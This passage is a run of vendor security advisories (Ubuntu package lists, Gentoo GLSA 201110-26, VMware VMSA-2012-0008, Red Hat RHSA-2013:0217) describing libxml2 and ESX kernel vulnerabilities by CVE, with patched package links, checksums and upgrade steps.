http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.7.5.dfsg-1ubuntu1.2_i386.deb Size/MD5: 825052 a08dd54b981c75b34ab6d1ed4bafeab0 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2-dbg_2.7.5.dfsg-1ubuntu1.2_i386.deb Size/MD5: 791128 ce3d1cafa4bb01b89e9e177b50550b34 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2_2.7.5.dfsg-1ubuntu1.2_i386.deb Size/MD5: 375674 bf0562bcaaad0ad309dd81c8e3ef5aae armel architecture (ARM Architecture): http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dbg_2.7.5.dfsg-1ubuntu1.2_armel.deb Size/MD5: 966100 07cb46b46002b9c7946b0299b2d205ed http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dev_2.7.5.dfsg-1ubuntu1.2_armel.deb Size/MD5: 741884 11d83fd85814365fc008cea1bd1e52f6 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-udeb_2.7.5.dfsg-1ubuntu1.2_armel.udeb Size/MD5: 533862 96e6d3c71db9545c2d57d89f4db995f3 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-utils_2.7.5.dfsg-1ubuntu1.2_armel.deb Size/MD5: 86218 4e151382e236cde0f3f82fd37b18538d http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2_2.7.5.dfsg-1ubuntu1.2_armel.deb Size/MD5: 801872 5b97fdc90993421880237019f9d02fff http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2-dbg_2.7.5.dfsg-1ubuntu1.2_armel.deb Size/MD5: 770238 039f0a0e344d2365f8552890efbc0975 http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2_2.7.5.dfsg-1ubuntu1.2_armel.deb Size/MD5: 355422 ba8244dc1fe423b437c7375d92bebaca lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dbg_2.7.5.dfsg-1ubuntu1.2_lpia.deb Size/MD5: 1031316 c420343bbfc991c8516b9999a25319db http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dev_2.7.5.dfsg-1ubuntu1.2_lpia.deb Size/MD5: 750944 5246772971938955e71d41e1b512a31a http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-udeb_2.7.5.dfsg-1ubuntu1.2_lpia.udeb Size/MD5: 554900 d7243b2c416f40a0c2eb9dec56d1f13c http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-utils_2.7.5.dfsg-1ubuntu1.2_lpia.deb Size/MD5: 86656 9617c05a80c2daf1e48bfd9ee02192b4 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2_2.7.5.dfsg-1ubuntu1.2_lpia.deb Size/MD5: 821118 bd776da273176465c61cd80b6fd0df50 http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2-dbg_2.7.5.dfsg-1ubuntu1.2_lpia.deb Size/MD5: 791212 5241180abd33029d3f7a301c1417e0b8 http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2_2.7.5.dfsg-1ubuntu1.2_lpia.deb Size/MD5: 371718 8525951d5522f336195908f5b7565982 powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dbg_2.7.5.dfsg-1ubuntu1.2_powerpc.deb Size/MD5: 1026720 5a5f7d31182ee933df689a6fce886290 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dev_2.7.5.dfsg-1ubuntu1.2_powerpc.deb Size/MD5: 843438 ba2b87a71d381e20536f4ecad1867db4 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-udeb_2.7.5.dfsg-1ubuntu1.2_powerpc.udeb Size/MD5: 580232 e23caecfdfd8455e1f5c494c8f53cb34 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-utils_2.7.5.dfsg-1ubuntu1.2_powerpc.deb Size/MD5: 87994 7375a59258b793f45c135a53467569db http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2_2.7.5.dfsg-1ubuntu1.2_powerpc.deb Size/MD5: 847482 4ebe08b7a0cf73fde545f3d730dfca47 http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2-dbg_2.7.5.dfsg-1ubuntu1.2_powerpc.deb Size/MD5: 872254 29bde0024ed0d4b6668df02527b459b8 http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2_2.7.5.dfsg-1ubuntu1.2_powerpc.deb Size/MD5: 392332 7f004d30c9f3bd6df7625fe0eaf4e535 sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dbg_2.7.5.dfsg-1ubuntu1.2_sparc.deb Size/MD5: 907352 da88f76309b2a8c48962149977edfd9b http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dev_2.7.5.dfsg-1ubuntu1.2_sparc.deb Size/MD5: 783932 32611c28a876dffbc1d16e4908bb49ee http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-udeb_2.7.5.dfsg-1ubuntu1.2_sparc.udeb Size/MD5: 551652 dd8fa2492883b434b204cbac0663d998 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-utils_2.7.5.dfsg-1ubuntu1.2_sparc.deb Size/MD5: 88430 ba62c89a6bbc3ed93f8a74c4fdcb12b2 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2_2.7.5.dfsg-1ubuntu1.2_sparc.deb Size/MD5: 818776 24627327b5d831853f3df15351e5e68f http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2-dbg_2.7.5.dfsg-1ubuntu1.2_sparc.deb Size/MD5: 798896 095a6e4fa17217dc8d84bd8514580784 http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2_2.7.5.dfsg-1ubuntu1.2_sparc.deb Size/MD5: 387620 0aa93f7fdf4e0196954aebe2335b90cc Updated packages for Ubuntu 10.04 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.7.6.dfsg-1ubuntu1.1.diff.gz Size/MD5: 110351 9d323231c795dff76aa84b0f8a5eb02b http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.7.6.dfsg-1ubuntu1.1.dsc Size/MD5: 2280 e079d8aace6383ccab67894bb3fc1be1 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.7.6.dfsg.orig.tar.gz Size/MD5: 3485094 6cf87a92f1909a2bf5882ec4fcdc330f Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-doc_2.7.6.dfsg-1ubuntu1.1_all.deb Size/MD5: 1373840 a9d176b929003fd3cdf8f47042c36c11 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dbg_2.7.6.dfsg-1ubuntu1.1_amd64.deb Size/MD5: 1018594 07ad3507748fe97fe7c5bbffb6627bba http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dev_2.7.6.dfsg-1ubuntu1.1_amd64.deb Size/MD5: 830410 b2cc75eb53c3fd7e0feace4d6a2bc4dd http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-udeb_2.7.6.dfsg-1ubuntu1.1_amd64.udeb Size/MD5: 603402 724f18ac82a5117fbdcd9db2da5d4cc5 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-utils_2.7.6.dfsg-1ubuntu1.1_amd64.deb Size/MD5: 92832 c64573abff217544c6c3ebd036de0e10 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.7.6.dfsg-1ubuntu1.1_amd64.deb Size/MD5: 872622 af44b596e3b5e54a63b25a144e3141a3 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2-dbg_2.7.6.dfsg-1ubuntu1.1_amd64.deb Size/MD5: 427924 520a505f7e0e8260dc76648a192a949c http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2_2.7.6.dfsg-1ubuntu1.1_amd64.deb Size/MD5: 243162 f29b62078718bc5166428ad04905af85 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dbg_2.7.6.dfsg-1ubuntu1.1_i386.deb Size/MD5: 1011598 8f775cdeec8e7746b9d00ccbcffc3cb9 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dev_2.7.6.dfsg-1ubuntu1.1_i386.deb Size/MD5: 752616 6b834b5db6934bee9b1d9274d6b8c6d3 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-udeb_2.7.6.dfsg-1ubuntu1.1_i386.udeb Size/MD5: 559356 7a3b9fa67dcefef1db2d291405d89126 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-utils_2.7.6.dfsg-1ubuntu1.1_i386.deb Size/MD5: 89106 30b7426457ae058d19e6690cf895876b http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.7.6.dfsg-1ubuntu1.1_i386.deb Size/MD5: 828650 506946d08ba270fa443d52863ce4f7d8 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2-dbg_2.7.6.dfsg-1ubuntu1.1_i386.deb Size/MD5: 397706 289461cbc775ab5f313a1f5c65b2329b http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2_2.7.6.dfsg-1ubuntu1.1_i386.deb Size/MD5: 223218 1c11d23305651a7be9debd3949732fb2 armel architecture (ARM Architecture): http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dbg_2.7.6.dfsg-1ubuntu1.1_armel.deb Size/MD5: 1007268 2a77cf53837addf247f4f17a3026b05e http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dev_2.7.6.dfsg-1ubuntu1.1_armel.deb Size/MD5: 709586 3ad0e0068ba20fbe18b14a961067b674 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-udeb_2.7.6.dfsg-1ubuntu1.1_armel.udeb Size/MD5: 509658 e01637a709c3bd04628a2174a436efb3 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-utils_2.7.6.dfsg-1ubuntu1.1_armel.deb Size/MD5: 89626 b8c5ee54cd1a2537888d4a8e0b9188fb http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2_2.7.6.dfsg-1ubuntu1.1_armel.deb Size/MD5: 778570 35904427a3a58b3e1325814bbe2ec6da http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2-dbg_2.7.6.dfsg-1ubuntu1.1_armel.deb Size/MD5: 400192 0c140a1dc5a3973c7b6567f505952f85 http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2_2.7.6.dfsg-1ubuntu1.1_armel.deb Size/MD5: 217942 da390ef06bd0af9894122840fcc89fa3 powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dbg_2.7.6.dfsg-1ubuntu1.1_powerpc.deb Size/MD5: 1028910 5d5b6be31a893bec95adca86166767d7 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dev_2.7.6.dfsg-1ubuntu1.1_powerpc.deb Size/MD5: 846878 330ebfd36ea6886b2712beda9fa9252d http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-udeb_2.7.6.dfsg-1ubuntu1.1_powerpc.udeb Size/MD5: 580398 772db7b7970a6d590d2173c8579f5600 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-utils_2.7.6.dfsg-1ubuntu1.1_powerpc.deb Size/MD5: 91112 83a93bea1349f77d92019d235e063851 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2_2.7.6.dfsg-1ubuntu1.1_powerpc.deb Size/MD5: 850418 f6ffb84375ec32ba7aa43eca456f4ec1 http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2-dbg_2.7.6.dfsg-1ubuntu1.1_powerpc.deb Size/MD5: 438684 c475d1d1f871613025dbd879da702c70 http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2_2.7.6.dfsg-1ubuntu1.1_powerpc.deb Size/MD5: 233396 2a14191af5956291d5011663ec20806a sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dbg_2.7.6.dfsg-1ubuntu1.1_sparc.deb Size/MD5: 917026 aa3d5dd2f398297813d571f25ae7f303 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dev_2.7.6.dfsg-1ubuntu1.1_sparc.deb Size/MD5: 804466 88ef9a818f8a9484b19c3738b19ca741 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-udeb_2.7.6.dfsg-1ubuntu1.1_sparc.udeb Size/MD5: 571556 2805248d8c2de8303e5771207e0a7731 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-utils_2.7.6.dfsg-1ubuntu1.1_sparc.deb Size/MD5: 91870 abe6e39306064725418c5dfa7dacb79b http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2_2.7.6.dfsg-1ubuntu1.1_sparc.deb Size/MD5: 840796 d8a397c919f2a9fb2f0e8123ef6e7234 http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2-dbg_2.7.6.dfsg-1ubuntu1.1_sparc.deb Size/MD5: 402706 e3d516ea07a17b95a248d44466f40c70 http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2_2.7.6.dfsg-1ubuntu1.1_sparc.deb Size/MD5: 231210 e275401867ac1840b77c1a80bc2aa3c1 Updated packages for Ubuntu 10.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.7.7.dfsg-4ubuntu0.1.diff.gz Size/MD5: 102171 77d4263441c905b5746d227d7524131c http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.7.7.dfsg-4ubuntu0.1.dsc Size/MD5: 2292 bab4c046375ed48fd2b6046a80ef0c86 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.7.7.dfsg.orig.tar.gz Size/MD5: 3498133 b1bc5a12294ab660436e4ce5d7090096 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-doc_2.7.7.dfsg-4ubuntu0.1_all.deb Size/MD5: 1341608 97295138f4a44f154090762b8fae6227 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dbg_2.7.7.dfsg-4ubuntu0.1_amd64.deb Size/MD5: 374942 0a8c8b7474783031cdf0ebb3c2596491 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dev_2.7.7.dfsg-4ubuntu0.1_amd64.deb Size/MD5: 832846 ebf5cc81726da51d2b541b9f4f96d815 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-udeb_2.7.7.dfsg-4ubuntu0.1_amd64.udeb Size/MD5: 168702 915b2dbb665b4c68c8b2e14dee7c2989 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-utils_2.7.7.dfsg-4ubuntu0.1_amd64.deb Size/MD5: 92656 119c5b98e1f56e874dd34999ba4cad92 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.7.7.dfsg-4ubuntu0.1_amd64.deb Size/MD5: 869490 8e20cf0a406048031938b898f56e9344 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2-dbg_2.7.7.dfsg-4ubuntu0.1_amd64.deb Size/MD5: 462604 586d4a79a4a938bacfd39bc7f367c17a http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2_2.7.7.dfsg-4ubuntu0.1_amd64.deb Size/MD5: 233354 558cc0eace45dc7b7164665703750ba4 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dbg_2.7.7.dfsg-4ubuntu0.1_i386.deb Size/MD5: 376084 d0b92ffdd68204a6835359651d205d9b http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dev_2.7.7.dfsg-4ubuntu0.1_i386.deb Size/MD5: 752970 bdefd733d9f1b701229d10e450e09d4b http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-udeb_2.7.7.dfsg-4ubuntu0.1_i386.udeb Size/MD5: 155050 168aa6ba5e8f073636ec4576e96e7aa5 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-utils_2.7.7.dfsg-4ubuntu0.1_i386.deb Size/MD5: 89374 4babb1e9d4a528f57017115b1264d2b6 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.7.7.dfsg-4ubuntu0.1_i386.deb Size/MD5: 823482 6f5685d22535a5874121bbf72e6dec79 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2-dbg_2.7.7.dfsg-4ubuntu0.1_i386.deb Size/MD5: 436746 99fecc2fe692be90a0284d9f087b43c0 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2_2.7.7.dfsg-4ubuntu0.1_i386.deb Size/MD5: 216480 b51359f40c9b66496439031128091043 armel architecture (ARM Architecture): http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dbg_2.7.7.dfsg-4ubuntu0.1_armel.deb Size/MD5: 372674 5f2aa59a517edc7e73628337169daa8d http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dev_2.7.7.dfsg-4ubuntu0.1_armel.deb Size/MD5: 786014 aca5a8d28aed279a6871dfc663a68ac5 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-udeb_2.7.7.dfsg-4ubuntu0.1_armel.udeb Size/MD5: 150910 d086027bfdbf11916c6534b8ea5085f1 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-utils_2.7.7.dfsg-4ubuntu0.1_armel.deb Size/MD5: 90220 b67c2ecb3a39fa455cc00a3e25699146 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2_2.7.7.dfsg-4ubuntu0.1_armel.deb Size/MD5: 810658 7f35e76cb03d3804cb040bb0df9da45d http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2-dbg_2.7.7.dfsg-4ubuntu0.1_armel.deb Size/MD5: 438750 b89297a4581a0efbd4ead1ea4ae7240b http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2_2.7.7.dfsg-4ubuntu0.1_armel.deb Size/MD5: 211510 5f3562bd3a3bde7b35607b7e9e3ce74c powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dbg_2.7.7.dfsg-4ubuntu0.1_powerpc.deb Size/MD5: 379506 a4ccee80dcfa63fba143a4e5edce0412 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dev_2.7.7.dfsg-4ubuntu0.1_powerpc.deb Size/MD5: 848288 399d84c1209a554afc9189c9004772cf http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-udeb_2.7.7.dfsg-4ubuntu0.1_powerpc.udeb Size/MD5: 159394 10b406b39207921540d2c7bf1ae6b5e3 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-utils_2.7.7.dfsg-4ubuntu0.1_powerpc.deb Size/MD5: 90994 ace5b65acf4959eb1ea896c93c0adb4a http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2_2.7.7.dfsg-4ubuntu0.1_powerpc.deb Size/MD5: 844276 25e575e50a2bffb8cd90308403d1475e http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2-dbg_2.7.7.dfsg-4ubuntu0.1_powerpc.deb Size/MD5: 478842 2d127f16857d270232010a9f79bcc0cb http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2_2.7.7.dfsg-4ubuntu0.1_powerpc.deb Size/MD5: 225856 f4e24a71d303f4a2c963c9a66122dfd8 . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201110-26 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: libxml2: Multiple vulnerabilities Date: October 26, 2011 Bugs: #345555, #370715, #386985 ID: 201110-26 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities were found in libxml2 which could lead to execution of arbitrary code or a Denial of Service. Background ========== libxml2 is the XML C parser and toolkit developed for the Gnome project. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 dev-libs/libxml2 < 2.7.8-r3 >= 2.7.8-r3 Description =========== Multiple vulnerabilities have been discovered in libxml2. Please review the CVE identifiers referenced below for details. Workaround ========== There is no known workaround at this time. Resolution ========== All libxml2 users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=dev-libs/libxml2-2.7.8-r3" References ========== [ 1 ] CVE-2010-4008 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4008 [ 2 ] CVE-2010-4494 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4494 [ 3 ] CVE-2011-1944 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1944 [ 4 ] CVE-2011-2821 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2821 [ 5 ] CVE-2011-2834 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2834 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201110-26.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2011 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 . Summary VMware ESX updates to ESX Service Console. Relevant releases ESX 4.1 without patches ESX410-201204401-SG,ESX410-201204402-SG 3. Problem Description a. ESX third party update for Service Console kernel The ESX Service Console Operating System (COS) kernel is updated which addresses several security issues in the COS kernel. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the names CVE-2011-3191, CVE-2011-4348 and CVE-2012-0028 to these issues. Column 4 of the following table lists the action required to remediate the vulnerability in each release, if a solution is available. VMware Product Running Replace with/ Product Version on Apply Patch ============= ======== ======= ================= vCenter any Windows not affected hosted * any any not affected ESXi any ESXi not affected ESX 4.1 ESX ESX410-201204401-SG ESX 4.0 ESX patch pending ** ESX 3.5 ESX not applicable * hosted products are VMware Workstation, Player, ACE, Fusion. ** Two of the three issues, CVE-2011-3191 and CVE-2011-4348, have already been addressed on ESX 4.0 in an earlier kernel patch. See VMSA-2012-0006 for details. b. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the names CVE-2010-4008, CVE-2011-0216, CVE-2011-1944, CVE-2011-2834, CVE-2011-3905, CVE-2011-3919 to these issues. Column 4 of the following table lists the action required to remediate the vulnerability in each release, if a solution is available. VMware Product Running Replace with/ Product Version on Apply Patch ============= ======== ======= ================= vCenter any Windows not affected hosted * any any not affected ESXi any ESXi not affected ESX 4.1 ESX ESX410-201204402-SG ESX 4.0 ESX patch pending ESX 3.5 ESX not applicable * hosted products are VMware Workstation, Player, ACE, Fusion. Solution Please review the patch/release notes for your product and version and verify the checksum of your downloaded file. ESX 4.1 ------- ESX410-201204001 md5sum: 7994635547b375b51422b1a166c6e214 sha1sum: 9d5f3c9cbc53a9e03524b9bf0935c71f3dadf620 http://kb.vmware.com/kb/2013057 ESX410-201204001 contains ESX410-201204401-SG and ESX410-201204402-SG 5. Change log 2012-04-26 VMSA-2012-0008 Initial security advisory in conjunction with the release of patches for ESX 4.1 on 2012-04-26. Contact E-mail list for product security notifications and announcements: http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce This Security Advisory is posted to the following lists: * security-announce at lists.vmware.com * bugtraq at securityfocus.com * full-disclosure at lists.grok.org.uk E-mail: security at vmware.com PGP key at: http://kb.vmware.com/kb/1055 VMware Security Advisories http://www.vmware.com/security/advisories VMware security response policy http://www.vmware.com/support/policies/security_response.html General support life cycle policy http://www.vmware.com/support/policies/eos.html VMware Infrastructure support life cycle policy http://www.vmware.com/support/policies/eos_vi.html Copyright 2012 VMware Inc. All rights reserved. 5 client) - i386, x86_64 3. (CVE-2011-3905) Note: Red Hat does not ship any applications that use libxml2 in a way that would allow the CVE-2011-1944, CVE-2010-4008, and CVE-2011-2834 flaws to be exploited; however, third-party applications may allow XPath expressions to be passed which could trigger these flaws. The desktop must be restarted (log out, then log back in) for this update to take effect. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ===================================================================== Red Hat Security Advisory Synopsis: Important: mingw32-libxml2 security update Advisory ID: RHSA-2013:0217-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2013-0217.html Issue date: 2013-01-31 CVE Names: CVE-2010-4008 CVE-2010-4494 CVE-2011-0216 CVE-2011-1944 CVE-2011-2821 CVE-2011-2834 CVE-2011-3102 CVE-2011-3905 CVE-2011-3919 CVE-2012-0841 CVE-2012-5134 ===================================================================== 1. Summary: Updated mingw32-libxml2 packages that fix several security issues are now available for Red Hat Enterprise Linux 6. This advisory also contains information about future updates for the mingw32 packages, as well as the deprecation of the packages with the release of Red Hat Enterprise Linux 6.4. The Red Hat Security Response Team has rated this update as having important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. 2. Relevant releases/architectures: Red Hat Enterprise Linux Desktop Optional (v. 6) - noarch Red Hat Enterprise Linux HPC Node Optional (v. 6) - noarch Red Hat Enterprise Linux Server Optional (v. 6) - noarch Red Hat Enterprise Linux Workstation Optional (v. 6) - noarch 3. Description: These packages provide the libxml2 library, a development toolbox providing the implementation of various XML standards, for users of MinGW (Minimalist GNU for Windows). IMPORTANT NOTE: The mingw32 packages in Red Hat Enterprise Linux 6 will no longer be updated proactively and will be deprecated with the release of Red Hat Enterprise Linux 6.4. These packages were provided to support other capabilities in Red Hat Enterprise Linux and were not intended for direct customer use. Customers are advised to not use these packages with immediate effect. Future updates to these packages will be at Red Hat's discretion and these packages may be removed in a future minor release. A heap-based buffer overflow flaw was found in the way libxml2 decoded entity references with long names. A remote attacker could provide a specially-crafted XML file that, when opened in an application linked against libxml2, would cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application. (CVE-2011-3919) A heap-based buffer underflow flaw was found in the way libxml2 decoded certain entities. A remote attacker could provide a specially-crafted XML file that, when opened in an application linked against libxml2, would cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application. (CVE-2012-5134) It was found that the hashing routine used by libxml2 arrays was susceptible to predictable hash collisions. Sending a specially-crafted message to an XML service could result in longer processing time, which could lead to a denial of service. To mitigate this issue, randomization has been added to the hashing function to reduce the chance of an attacker successfully causing intentional collisions. (CVE-2012-0841) Multiple flaws were found in the way libxml2 parsed certain XPath (XML Path Language) expressions. (CVE-2010-4008, CVE-2010-4494, CVE-2011-2821, CVE-2011-2834) Two heap-based buffer overflow flaws were found in the way libxml2 decoded certain XML files. A remote attacker could provide a specially-crafted XML file that, when opened in an application linked against libxml2, would cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application. (CVE-2011-0216, CVE-2011-3102) An integer overflow flaw, leading to a heap-based buffer overflow, was found in the way libxml2 parsed certain XPath expressions. (CVE-2011-1944) An out-of-bounds memory read flaw was found in libxml2. A remote attacker could provide a specially-crafted XML file that, when opened in an application linked against libxml2, would cause the application to crash. (CVE-2011-3905) Red Hat would like to thank the Google Security Team for reporting the CVE-2010-4008 issue. Upstream acknowledges Bui Quang Minh from Bkis as the original reporter of CVE-2010-4008. All users of mingw32-libxml2 are advised to upgrade to these updated packages, which contain backported patches to correct these issues. 4. Solution: Before applying this update, make sure all previously-released errata relevant to your system have been applied. This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/knowledge/articles/11258 5. Bugs fixed (http://bugzilla.redhat.com/): 645341 - CVE-2010-4008 libxml2: Crash (stack frame overflow or NULL pointer dereference) by traversal of XPath axis 665963 - CVE-2010-4494 libxml2: double-free in XPath processing code 709747 - CVE-2011-1944 libxml, libxml2: Heap-based buffer overflow by adding new namespace node to an existing nodeset or merging nodesets 724906 - CVE-2011-0216 libxml2: Off-by-one error leading to heap-based buffer overflow in encoding 735712 - CVE-2011-2821 libxml2: double free caused by malformed XPath expression in XSLT 735751 - CVE-2011-2834 libxml2: double-free caused by malformed XPath expression in XSLT 767387 - CVE-2011-3905 libxml2 out of bounds read 771896 - CVE-2011-3919 libxml2: Heap-based buffer overflow when decoding an entity reference with a long name 787067 - CVE-2012-0841 libxml2: hash table collisions CPU usage DoS 822109 - CVE-2011-3102 libxml: An off-by-one out-of-bounds write by XPointer part evaluation 880466 - CVE-2012-5134 libxml2: Heap-buffer-underflow in xmlParseAttValueComplex 6. Package List: Red Hat Enterprise Linux Desktop Optional (v. 6): Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/mingw32-libxml2-2.7.6-6.el6_3.src.rpm noarch: mingw32-libxml2-2.7.6-6.el6_3.noarch.rpm mingw32-libxml2-debuginfo-2.7.6-6.el6_3.noarch.rpm mingw32-libxml2-static-2.7.6-6.el6_3.noarch.rpm Red Hat Enterprise Linux HPC Node Optional (v. 6): Source: 